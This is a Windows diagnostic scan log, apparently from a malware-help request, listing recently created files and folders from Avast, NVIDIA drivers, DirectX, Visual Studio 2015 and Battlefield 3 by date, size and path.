2016-07-13 19:25 - 2016-07-13 19:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVAST Software
2016-07-13 19:24 - 2016-07-13 19:25 - 00473592 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsp.sys
2016-07-13 19:24 - 2016-07-13 19:24 - 00390984 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2016-07-13 19:24 - 2016-07-13 19:24 - 00290088 _____ (AVAST Software) C:\Windows\system32\Drivers\aswVmm.sys
2016-07-13 19:24 - 2016-07-13 19:24 - 00162904 _____ (AVAST Software) C:\Windows\system32\Drivers\aswStm.sys
2016-07-13 19:24 - 2016-07-13 19:24 - 00108304 _____ (AVAST Software) C:\Windows\system32\Drivers\aswMonFlt.sys
2016-07-13 19:24 - 2016-07-13 19:24 - 00103064 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys
2016-07-13 19:24 - 2016-07-13 19:24 - 00074544 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRvrt.sys
2016-07-13 19:24 - 2016-07-13 19:24 - 00053208 _____ (AVAST Software) C:\Windows\avastSS.scr
2016-07-13 19:24 - 2016-07-13 19:24 - 00037656 _____ (AVAST Software) C:\Windows\system32\Drivers\aswHwid.sys
2016-07-13 19:24 - 2016-07-13 19:24 - 00003922 _____ C:\Windows\System32\Tasks\avast! Emergency Update
2016-07-13 19:24 - 2016-07-13 19:24 - 00000000 ____D C:\Windows\System32\Tasks\AVAST Software
2016-07-13 19:24 - 2016-07-13 19:24 - 00000000 ____D C:\Program Files\Common Files\AV
2016-07-13 19:24 - 2016-07-13 19:23 - 01070904 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSnx.sys
2016-07-13 19:23 - 2016-07-13 19:26 - 00000000 ____D C:\Program Files\AVAST Software
2016-07-13 19:22 - 2016-07-13 19:26 - 00000000 ____D C:\ProgramData\AVAST Software
2016-07-13 15:44 - 2016-07-13 18:18 - 00000000 ____D C:\Users\User not found\AppData\Roaming\NVIDIA
2016-07-12 19:20 - 2016-07-12 19:20 - 06079168 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerInstaller.exe
2016-07-11 18:17 - 2016-07-11 18:17 - 00000000 ____D C:\Users\User not found\AppData\Local\NVIDIA Corporation
2016-07-11 18:16 - 2016-07-11 18:16 - 00000000 ____D C:\Users\User not found\AppData\Local\NVIDIA
2016-07-11 18:16 - 2016-06-29 23:44 - 00112216 _____ C:\Windows\system32\NvRtmpStreamer64.dll
2016-07-11 18:15 - 2016-07-11 18:15 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2016-07-11 18:15 - 2016-06-29 23:44 - 01767944 _____ (NVIDIA Corporation) C:\Windows\system32\nvspcap64.dll
2016-07-11 18:15 - 2016-06-29 23:44 - 01756424 _____ (NVIDIA Corporation) C:\Windows\system32\nvspbridge64.dll
2016-07-11 18:15 - 2016-06-29 23:44 - 01377800 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvspcap.dll
2016-07-11 18:15 - 2016-06-29 23:44 - 01316184 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvspbridge.dll
2016-07-11 18:14 - 2016-07-11 18:14 - 00000000 ____D C:\Windows\SysWOW64\NV
2016-07-11 18:14 - 2016-07-11 18:14 - 00000000 ____D C:\Windows\system32\NV
2016-07-11 18:14 - 2016-07-11 18:14 - 00000000 ____D C:\Program Files (x86)\VulkanRT
2016-07-11 18:14 - 2016-06-29 19:36 - 06364728 _____ (NVIDIA Corporation) C:\Windows\system32\nvcpl.dll
2016-07-11 18:14 - 2016-06-29 19:36 - 02455608 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvc64.dll
2016-07-11 18:14 - 2016-06-29 19:36 - 01762752 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvcr.dll
2016-07-11 18:14 - 2016-06-29 19:36 - 01352760 _____ (NVIDIA Corporation) C:\Windows\system32\nvvsvc.exe
2016-07-11 18:14 - 2016-06-29 19:36 - 00532416 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshext.dll
2016-07-11 18:14 - 2016-06-29 19:36 - 00393784 _____ (NVIDIA Corporation) C:\Windows\system32\nvmctray.dll
2016-07-11 18:14 - 2016-06-29 19:36 - 00083512 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshextr.dll
2016-07-11 18:14 - 2016-06-29 19:36 - 00069568 _____ (NVIDIA Corporation) C:\Windows\system32\nvshext.dll
2016-07-11 18:14 - 2016-06-23 09:04 - 07208075 _____ C:\Windows\system32\nvcoproc.bin
2016-07-11 18:14 - 2016-05-04 03:23 - 00129824 _____ C:\Windows\SysWOW64\vulkan-1.dll
2016-07-11 18:14 - 2016-05-04 03:22 - 00130848 _____ C:\Windows\system32\vulkan-1.dll
2016-07-11 18:14 - 2016-05-04 03:22 - 00045344 _____ C:\Windows\system32\vulkaninfo.exe
2016-07-11 18:14 - 2016-05-04 03:22 - 00040224 _____ C:\Windows\SysWOW64\vulkaninfo.exe
2016-07-11 18:13 - 2016-07-11 18:17 - 00000000 ____D C:\ProgramData\NVIDIA Corporation
2016-07-11 18:06 - 2016-06-29 23:44 - 39979576 _____ C:\Windows\system32\nvcompiler.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 35115968 _____ C:\Windows\SysWOW64\nvcompiler.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 31626808 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglv64.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 25402424 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglv32.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 19199216 _____ (NVIDIA Corporation) C:\Windows\system32\nvwgf2umx.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 17302264 _____ (NVIDIA Corporation) C:\Windows\system32\nvd3dumx.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 16774904 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvwgf2um.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 14356952 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvd3dum.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 13523392 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvlddmkm.sys
2016-07-11 18:06 - 2016-06-29 23:44 - 10672752 _____ (NVIDIA Corporation) C:\Windows\system32\nvopencl.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 10656296 _____ C:\Windows\system32\nvptxJitCompiler.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 10214760 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuda.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 09006760 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvopencl.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 08742032 _____ C:\Windows\SysWOW64\nvptxJitCompiler.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 08600904 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuda.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 03828968 _____ (NVIDIA Corporation) C:\Windows\system32\nvapi64.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 03513400 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuvid.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 03387080 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvapi.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 03067448 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuvid.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 01922616 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispco6436869.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 01571776 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispgenco6436869.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00984000 _____ (NVIDIA Corporation) C:\Windows\system32\NvFBC64.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00909248 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFR64.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00771640 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvFBC.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00707520 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFR.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00669952 _____ C:\Windows\system32\nvfatbinaryLoader.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00565392 _____ C:\Windows\SysWOW64\nvfatbinaryLoader.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00476664 _____ (NVIDIA Corporation) C:\Windows\system32\nvumdshimx.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00394912 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvumdshim.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00178136 _____ (NVIDIA Corporation) C:\Windows\system32\nvinitx.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00155768 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvinit.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00153416 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglshim64.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00131768 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglshim32.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00113216 _____ (NVIDIA Corporation) C:\Windows\system32\nvaudcap64v.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00102976 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvaudcap32v.dll
2016-07-11 18:06 - 2016-06-29 23:44 - 00056384 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvvad64v.sys
2016-07-11 18:06 - 2016-06-29 23:44 - 00039124 _____ C:\Windows\system32\nvinfo.pb
2016-07-11 18:06 - 2016-06-29 23:44 - 00038336 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvpciflt.sys
2016-07-11 18:06 - 2016-06-29 23:44 - 00000594 _____ C:\Windows\SysWOW64\nv-vk32.json
2016-07-11 18:06 - 2016-06-29 23:44 - 00000594 _____ C:\Windows\system32\nv-vk64.json
2016-07-11 18:02 - 2016-07-11 18:02 - 00000000 ____D C:\NVIDIA
2016-07-06 00:18 - 2016-07-06 00:18 - 00000990 _____ C:\Users\User not found\Desktop\Problemas da net.txt
2016-07-04 17:31 - 2016-07-04 17:39 - 00000000 ____D C:\Users\User not found\Desktop\Fotos
2016-07-04 16:33 - 2016-07-04 16:33 - 00280904 _____ C:\Windows\SysWOW64\PnkBstrB.xtr
2016-07-04 16:33 - 2016-07-04 16:33 - 00000000 ____D C:\Users\User not found\AppData\Local\PunkBuster
2016-07-04 16:32 - 2016-07-04 16:32 - 00000000 ____D C:\Users\User not found\AppData\Local\ESN
2016-07-04 16:32 - 2016-07-04 16:32 - 00000000 ____D C:\Program Files (x86)\Battlelog Web Plugins
2016-07-02 19:42 - 2016-07-02 19:42 - 00000000 ____D C:\Users\User not found\AppData\Roaming\NuGet
2016-07-02 19:42 - 2016-07-02 19:42 - 00000000 ____D C:\Users\User not found\AppData\LocalLow\Temp
2016-07-02 19:35 - 2016-07-02 19:35 - 00000000 ____D C:\ProgramData\Microsoft Visual Studio
2016-07-02 19:31 - 2016-07-02 19:31 - 00000000 ____D C:\Users\User not found\.dnx
2016-07-02 15:46 - 2016-07-15 14:34 - 00000000 ____D C:\Users\User not found\Documents\Visual Studio 2015
2016-07-02 15:13 - 2016-07-02 15:13 - 00000000 ____D C:\Program Files\IIS Express
2016-07-02 15:13 - 2016-07-02 15:13 - 00000000 ____D C:\Program Files (x86)\IIS Express
2016-07-02 15:11 - 2016-07-02 15:11 - 00000000 ____D C:\Users\User not found\AppData\Local\VSIXInstaller
2016-07-02 15:02 - 2016-07-02 15:02 - 00030400 _____ (Microsoft Corporation) C:\Windows\system32\aspnet_counters.dll
2016-07-02 15:02 - 2016-07-02 15:02 - 00028352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aspnet_counters.dll
2016-07-02 14:44 - 2016-07-02 14:44 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2016-07-02 14:44 - 2016-07-02 14:44 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2016-07-02 14:42 - 2016-07-02 14:43 - 00000000 ____D C:\Program Files (x86)\Microsoft SQL Server Compact Edition
2016-07-02 14:42 - 2016-07-02 14:42 - 00000000 ____D C:\Program Files\Microsoft SQL Server Compact Edition
2016-07-02 14:37 - 2016-07-02 14:37 - 00000000 ____D C:\ProgramData\Microsoft DNX
2016-07-02 14:29 - 2016-07-02 14:29 - 00000000 ____D C:\Program Files\IIS
2016-07-02 14:29 - 2016-07-02 14:29 - 00000000 ____D C:\Program Files (x86)\IIS
2016-07-02 14:22 - 2016-07-16 13:21 - 00000000 ____D C:\Program Files (x86)\Windows Kits
2016-07-02 14:22 - 2016-07-02 14:22 - 00000000 ____D C:\Program Files (x86)\Microsoft Help Viewer
2016-07-02 14:20 - 2016-07-16 13:20 - 00000000 ____D C:\Windows\SysWOW64\1033
2016-07-02 14:20 - 2016-07-02 15:37 - 00000000 ____D C:\Program Files\Microsoft SQL Server
2016-07-02 14:20 - 2016-07-02 15:37 - 00000000 ____D C:\Program Files (x86)\Microsoft SQL Server
2016-07-02 14:17 - 2016-07-16 13:35 - 00000000 ____D C:\Windows\system32\1033
2016-07-02 14:17 - 2016-07-02 14:17 - 00000000 ____H C:\Windows\system32\Drivers\Msft_User_SensorsSimulatorDriver_01_11_00.Wdf
2016-07-02 14:13 - 2016-07-16 13:23 - 00000000 ____D C:\Program Files (x86)\Microsoft Visual Studio 14.0
2016-07-02 14:13 - 2016-07-16 13:21 - 00000000 ____D C:\Program Files (x86)\Microsoft SDKs
2016-07-02 14:01 - 2016-07-02 14:01 - 00000000 ____D C:\ProgramData\VsTelemetry
2016-07-02 12:36 - 2016-07-02 12:36 - 00000000 ____D C:\Users\User not found\Downloads\Visual Studio 2015 Enterprice ISO + Serial Keys - [Fullstuff]
2016-06-29 16:58 - 2016-06-29 16:58 - 00000000 _RSHD C:\Users\User not found\AppData\Roaming\WindowsServices
2016-06-28 16:33 - 2016-07-02 15:52 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-06-27 17:18 - 2016-07-04 16:33 - 00000000 ____D C:\Users\User not found\Documents\Battlefield 3
2016-06-25 18:16 - 2016-06-28 16:43 - 00000000 ____D C:\ProgramData\EA Logs
2016-06-25 18:16 - 2016-06-25 18:16 - 00000000 ____D C:\ProgramData\EA Core
2016-06-23 21:38 - 2016-06-23 21:38 - 00001186 _____ C:\Users\Public\Desktop\Battlefield 3.lnk
2016-06-23 21:38 - 2016-06-23 21:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battlefield 3
2016-06-23 21:21 - 2016-07-04 16:33 - 00280904 _____ C:\Windows\SysWOW64\PnkBstrB.exe
2016-06-23 21:21 - 2016-06-23 21:38 - 00189248 _____ C:\Windows\SysWOW64\PnkBstrB.ex0
2016-06-23 21:21 - 2016-06-23 21:38 - 00075136 _____ C:\Windows\SysWOW64\PnkBstrA.exe
2016-06-23 21:21 - 2010-06-02 04:55 - 00527192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_7.dll
2016-06-23 21:21 - 2010-06-02 04:55 - 00518488 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_7.dll
2016-06-23 21:21 - 2010-06-02 04:55 - 00239960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_7.dll
2016-06-23 21:21 - 2010-06-02 04:55 - 00176984 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_7.dll
2016-06-23 21:21 - 2010-06-02 04:55 - 00077656 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_5.dll
2016-06-23 21:21 - 2010-06-02 04:55 - 00074072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_5.dll
2016-06-23 21:21 - 2010-05-26 11:41 - 02526056 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_43.dll
2016-06-23 21:21 - 2010-05-26 11:41 - 02401112 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_43.dll
2016-06-23 21:21 - 2010-05-26 11:41 - 02106216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_43.dll
2016-06-23 21:21 - 2010-05-26 11:41 - 01998168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_43.dll
2016-06-23 21:21 - 2010-05-26 11:41 - 01907552 _____ (Microsoft Corporation) C:\Windows\system32\d3dcsx_43.dll
2016-06-23 21:21 - 2010-05-26 11:41 - 01868128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dcsx_43.dll
2016-06-23 21:21 - 2010-05-26 11:41 - 00511328 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_43.dll
2016-06-23 21:21 - 2010-05-26 11:41 - 00470880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_43.dll
2016-06-23 21:21 - 2010-05-26 11:41 - 00276832 _____ (Microsoft Corporation) C:\Windows\system32\d3dx11_43.dll
2016-06-23 21:21 - 2010-05-26 11:41 - 00248672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx11_43.dll
2016-06-23 21:21 - 2010-02-04 10:01 - 00530776 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_6.dll
2016-06-23 21:21 - 2010-02-04 10:01 - 00528216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_6.dll
2016-06-23 21:21 - 2010-02-04 10:01 - 00238936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_6.dll
2016-06-23 21:21 - 2010-02-04 10:01 - 00176984 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_6.dll
2016-06-23 21:21 - 2010-02-04 10:01 - 00078680 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_4.dll
2016-06-23 21:21 - 2010-02-04 10:01 - 00074072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_4.dll
2016-06-23 21:21 - 2010-02-04 10:01 - 00024920 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_7.dll
2016-06-23 21:21 - 2010-02-04 10:01 - 00022360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_7.dll
2016-06-23 21:21 - 2009-09-04 17:44 - 00517960 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_5.dll
2016-06-23 21:21 - 2009-09-04 17:44 - 00515416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_5.dll
2016-06-23 21:21 - 2009-09-04 17:44 - 00238936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_5.dll
2016-06-23 21:21 - 2009-09-04 17:44 - 00176968 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_5.dll
2016-06-23 21:21 - 2009-09-04 17:44 - 00073544 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_3.dll
2016-06-23 21:21 - 2009-09-04 17:44 - 00069464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_3.dll
2016-06-23 21:21 - 2009-09-04 17:29 - 05554512 _____ (Microsoft Corporation) C:\Windows\system32\d3dcsx_42.dll
2016-06-23 21:21 - 2009-09-04 17:29 - 05501792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dcsx_42.dll
2016-06-23 21:21 - 2009-09-04 17:29 - 02582888 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_42.dll
2016-06-23 21:21 - 2009-09-04 17:29 - 02475352 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_42.dll
2016-06-23 21:21 - 2009-09-04 17:29 - 01974616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_42.dll
2016-06-23 21:21 - 2009-09-04 17:29 - 01892184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_42.dll
2016-06-23 21:21 - 2009-09-04 17:29 - 00523088 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_42.dll
2016-06-23 21:21 - 2009-09-04 17:29 - 00453456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_42.dll
2016-06-23 21:21 - 2009-09-04 17:29 - 00285024 _____ (Microsoft Corporation) C:\Windows\system32\d3dx11_42.dll
2016-06-23 21:21 - 2009-09-04 17:29 - 00235344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx11_42.dll
2016-06-23 21:21 - 2009-03-16 14:18 - 00521560 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_4.dll
2016-06-23 21:21 - 2009-03-16 14:18 - 00517448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_4.dll
2016-06-23 21:21 - 2009-03-16 14:18 - 00235352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_4.dll
2016-06-23 21:21 - 2009-03-16 14:18 - 00174936 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_4.dll
2016-06-23 21:21 - 2009-03-16 14:18 - 00024920 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_6.dll
2016-06-23 21:21 - 2009-03-16 14:18 - 00022360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_6.dll
2016-06-23 21:21 - 2009-03-09 15:27 - 05425496 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_41.dll
2016-06-23 21:21 - 2009-03-09 15:27 - 04178264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_41.dll
2016-06-23 21:21 - 2009-03-09 15:27 - 02430312 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_41.dll
2016-06-23 21:21 - 2009-03-09 15:27 - 01846632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_41.dll
2016-06-23 21:21 - 2009-03-09 15:27 - 00520544 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_41.dll
2016-06-23 21:21 - 2009-03-09 15:27 - 00453456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_41.dll
2016-06-23 21:21 - 2008-10-27 10:04 - 00518480 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_3.dll
2016-06-23 21:21 - 2008-10-27 10:04 - 00514384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_3.dll
2016-06-23 21:21 - 2008-10-27 10:04 - 00235856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_3.dll
2016-06-23 21:21 - 2008-10-27 10:04 - 00175440 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_3.dll
2016-06-23 21:21 - 2008-10-27 10:04 - 00074576 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_2.dll
2016-06-23 21:21 - 2008-10-27 10:04 - 00070992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_2.dll
2016-06-23 21:21 - 2008-10-27 10:04 - 00025936 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_5.dll
2016-06-23 21:21 - 2008-10-27 10:04 - 00023376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_5.dll
2016-06-23 21:21 - 2008-10-15 06:22 - 05631312 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_40.dll
2016-06-23 21:21 - 2008-10-15 06:22 - 04379984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_40.dll
2016-06-23 21:21 - 2008-10-15 06:22 - 02605920 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_40.dll
2016-06-23 21:21 - 2008-10-15 06:22 - 02036576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_40.dll
2016-06-23 21:21 - 2008-10-15 06:22 - 00519000 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_40.dll
2016-06-23 21:21 - 2008-10-15 06:22 - 00452440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_40.dll
2016-06-23 21:21 - 2008-07-31 10:41 - 00238088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_2.dll
2016-06-23 21:21 - 2008-07-31 10:41 - 00177672 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_2.dll
2016-06-23 21:21 - 2008-07-31 10:41 - 00072200 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_1.dll
2016-06-23 21:21 - 2008-07-31 10:41 - 00068616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_1.dll
2016-06-23 21:21 - 2008-07-31 10:40 - 00513544 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_2.dll
2016-06-23 21:21 - 2008-07-31 10:40 - 00509448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_2.dll
2016-06-23 21:21 - 2008-07-10 11:01 - 00467984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_39.dll
2016-06-23 21:21 - 2008-07-10 11:00 - 04992520 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_39.dll
2016-06-23 21:21 - 2008-07-10 11:00 - 03851784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_39.dll
2016-06-23 21:21 - 2008-07-10 11:00 - 01942552 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_39.dll
2016-06-23 21:21 - 2008-07-10 11:00 - 01493528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_39.dll
2016-06-23 21:21 - 2008-07-10 11:00 - 00540688 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_39.dll
2016-06-23 21:20 - 2008-05-30 14:19 - 00511496 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_1.dll
2016-06-23 21:20 - 2008-05-30 14:19 - 00507400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_1.dll
2016-06-23 21:20 - 2008-05-30 14:18 - 00238088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_1.dll
2016-06-23 21:20 - 2008-05-30 14:18 - 00177672 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_1.dll
2016-06-23 21:20 - 2008-05-30 14:17 - 00068104 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_0.dll
2016-06-23 21:20 - 2008-05-30 14:17 - 00065032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_0.dll
2016-06-23 21:20 - 2008-05-30 14:17 - 00025608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_4.dll
2016-06-23 21:20 - 2008-05-30 14:16 - 00028168 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_4.dll
2016-06-23 21:20 - 2008-05-30 14:11 - 04991496 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_38.dll
2016-06-23 21:20 - 2008-05-30 14:11 - 03850760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_38.dll
2016-06-23 21:20 - 2008-05-30 14:11 - 01941528 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_38.dll
2016-06-23 21:20 - 2008-05-30 14:11 - 01491992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_38.dll
2016-06-23 21:20 - 2008-05-30 14:11 - 00540688 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_38.dll
2016-06-23 21:20 - 2008-05-30 14:11 - 00467984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_38.dll
2016-06-23 21:20 - 2008-03-05 16:04 - 00489480 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_0.dll
2016-06-23 21:20 - 2008-03-05 16:03 - 00479752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_0.dll
2016-06-23 21:20 - 2008-03-05 16:03 - 00238088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_0.dll
2016-06-23 21:20 - 2008-03-05 16:03 - 00177672 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_0.dll
2016-06-23 21:20 - 2008-03-05 16:00 - 00028168 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_3.dll
2016-06-23 21:20 - 2008-03-05 16:00 - 00025608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_3.dll
2016-06-23 21:20 - 2008-03-05 15:56 - 04910088 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_37.dll
2016-06-23 21:20 - 2008-03-05 15:56 - 03786760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_37.dll
2016-06-23 21:20 - 2008-03-05 15:56 - 01860120 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_37.dll
2016-06-23 21:20 - 2008-03-05 15:56 - 01420824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_37.dll
2016-06-23 21:20 - 2008-02-05 23:07 - 00529424 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_37.dll
2016-06-23 21:20 - 2008-02-05 23:07 - 00462864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_37.dll
2016-06-23 21:20 - 2007-10-22 03:40 - 00411656 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_10.dll
2016-06-23 21:20 - 2007-10-22 03:39 - 00267272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_10.dll
